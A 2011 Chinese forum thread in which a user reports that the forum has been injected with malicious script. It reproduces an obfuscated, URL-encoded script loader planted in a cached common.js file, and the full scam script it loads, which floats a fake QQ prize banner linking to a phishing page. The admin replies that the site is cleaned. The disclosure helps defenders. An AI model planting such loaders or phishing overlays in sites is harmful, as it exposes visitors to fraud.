论坛中毒，提供一些信息，供管理员参考

发表于 2011-7-27 10:32


	早上打开一个帖子，发现有QQ中奖信息，怀疑网站被挂马登录/注册后可看大图 1.于是右键查看了广告图片地址是ais58点com/public/cache/backup/es.gif 2.查看了网页源代码，在头部发现可疑代码。<head> </head>之间第17行 <script src="forumdata/cache/common点js?WHH" type="text/javascript"></script> 3.打开bbs点138点net/forumdata/cache/common点js?WHH 这个地址发被加密的地址。代码如下 document.write('<script src=h踢踢屁 : // %77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>') 4.解密H踢踢屁： / / %77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 得真实地址是www点ais58点com/public/cache/backup/ajax.js 5.浏览器打开www点ais58点com/public/cache/backup/ajax.js发现代码如下：这正是被挂马的广告代码

发表于 2011-7-27 10:27


	早上打开一个帖子，发现有QQ中奖信息，怀疑网站被挂马登录/注册后可看大图 1.于是右键查看了广告图片地址是http://www.ais58.com/public/cache/backup/es.gif 2.查看了网页源代码，在头部发现可疑代码。<head> </head>之间第17行 <script src="forumdata/cache/common.js?WHH" type="text/javascript"></script> 3.打开http://bbs.138.net/forumdata/cache/common.js?WHH 这个地址发被加密的地址。代码如下 document.write('<script src=http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>') 4.解密http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 得真实地址是http://www.ais58.com/public/cache/backup/ajax.js 5.浏览器打开http://www.ais58.com/public/cache/backup/ajax.js发现代码如下：这正是被挂马的广告代码 var cookieString=document.cookie; var start=cookieString.indexOf("cookiesleep"); if(start!=-1){}else{var expires=new Date(); expires.setTime(expires.getTime()+66060*1000); document.cookie="cookiesleep=test;expires="+expires.toGMTString(); var qq_etewidth = 254; var qq_eteheight = 156; var qq_banner_filename = "http://www.ais58.com/public/cache/backup/es.gif"; var qq_gotoUrl = "http://www.ais58.com/pic/%2570%2565%2572%2568%2561%2570%2573/%2564%2569%2573%2563%256F%2576%2565%2572/%2563%256F%256E%2573%2569%2564%2565%2572/%2570%2569%2563%2574%2575%2572%2565/can.asp"; document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>") document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>") document.write("</div>") var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body; var adst = document.getElementById("eteUnionUpFloat").style; adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px"; adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px"; function moveR() { adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px"; adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px"; } var objTimer=setInterval("moveR();", 100); function CloseX(){ adst.display='none'; } function ete_closediv() { document.getElementById('eteUnionUpFloat').style.visibility='hidden'; if(objTimer) window.clearInterval(objTimer) }document.writeln("<BGSOUND balance=0 src=\"http://www.ais58.com/public/cache/backup/system.wav\" volume=-240>"); }

发表于 2011-7-30 23:04


	抱歉，这几天被弄得头晕，刚刚才看到。最后一次清理是30日凌晨，这次希望彻底干净了

发表于 2011-7-31 00:24


	用FF好像从没见过这些

论坛中毒，提供一些信息，供管理员参考

论坛中毒了，提供一些信息，供管理员参考。